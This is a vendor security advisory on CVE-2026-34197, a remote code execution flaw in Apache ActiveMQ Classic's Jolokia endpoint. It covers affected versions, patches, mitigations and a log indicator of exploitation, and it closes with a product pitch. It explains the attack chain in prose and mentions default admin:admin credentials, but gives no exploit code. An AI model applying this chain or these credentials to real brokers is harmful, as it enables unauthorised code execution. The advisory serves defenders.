What is CVE-2026-34197?
CVE-2026-34197 is a remote code execution vulnerability in Apache ActiveMQ Classic. The flaw exists in the Jolokia JMX-HTTP bridge, which ActiveMQ exposes at /api/jolokia/ on the broker's web console. The default Jolokia access policy permits exec operations on all ActiveMQ MBeans, including BrokerService.addNetworkConnector(String) and BrokerService.addConnector(String).
An authenticated attacker can invoke these operations with a crafted discovery URI that triggers ActiveMQ's VM transport brokerConfig parameter to load a remote Spring XML application context. Because Spring's ResourceXmlApplicationContext instantiates all singleton beans before the BrokerService validates the configuration, arbitrary code execution occurs on the broker's JVM through bean factory methods such as Runtime.exec().
The vulnerability carries a CVSS v3.1 base score of 8.8 (High). Exploitation requires low privileges in the general case, but default credentials (admin:admin) remain common across many ActiveMQ deployments. On ActiveMQ versions 6.0.0 through 6.1.1, a separate flaw (CVE-2024-32114) removed the Jolokia endpoint from the web console's security constraints entirely, making CVE-2026-34197 effectively unauthenticated on those versions.
The underlying code path has been present for approximately 13 years. ActiveMQ has been a repeated target for real-world attackers, and public proof-of-concept exploits are already available.
What assets are affected by CVE-2026-34197?
Apache ActiveMQ Classic versions prior to 5.19.4 and versions 6.0.0 through 6.2.2 are affected. Any system running an unpatched ActiveMQ broker with the web console enabled on port 8161 is potentially vulnerable.
In practice, affected assets are message brokers that serve as middleware between application components. ActiveMQ is widely deployed in enterprise environments for asynchronous messaging, event-driven architectures, and system integration. These brokers commonly sit behind load balancers or within internal networks, but many are also directly internet-facing due to legacy deployment patterns, cloud migrations, or operational convenience.
The web console, including the Jolokia endpoint, is enabled by default in most ActiveMQ installations. Organizations running older versions often lack visibility into whether 8161 is reachable from untrusted networks. Environments with mixed on-premises and cloud infrastructure are especially prone to having unintentionally exposed management interfaces.
Are fixes available?
Patches are available. Apache has released ActiveMQ Classic 5.19.4 and 6.2.3, both of which remove the ability for the addNetworkConnector operation to add vm:// transports. This code path was never intended to be exposed as a remote operation.
Organizations running ActiveMQ versions 6.0.0 through 6.1.1 should treat remediation as especially urgent, as the combination of CVE-2026-34197 and CVE-2024-32114 enables unauthenticated remote code execution on those versions. Upgrading to 6.2.3 addresses both vulnerabilities.
Defenders should verify patch availability and applicability directly with their vendor or distribution maintainer rather than assuming a fix is available across all environments. Some Linux distributions may still be evaluating the patch for their packaged ActiveMQ versions.
Are there any other recommended actions to take?
Restrict or disable Jolokia exec operations on the ActiveMQ web console. Block or limit access to /api/jolokia/ and restrict the web console (port 8161) to trusted management networks only. Replace default credentials with strong, unique authentication. Monitor ActiveMQ broker logs for network connector activity referencing vm:// URIs with brokerConfig=xbean:http, which is a clear indicator of exploitation attempts.
How can CyCognito help your organization?
CyCognito published an Emerging Threat Advisory for CVE-2026-34197 in the CyCognito platform and is actively researching enhanced detection capabilities for this vulnerability.
To learn how CyCognito can help your organization reduce external exposure and manage emerging threats more effectively, contact us to request a demo.
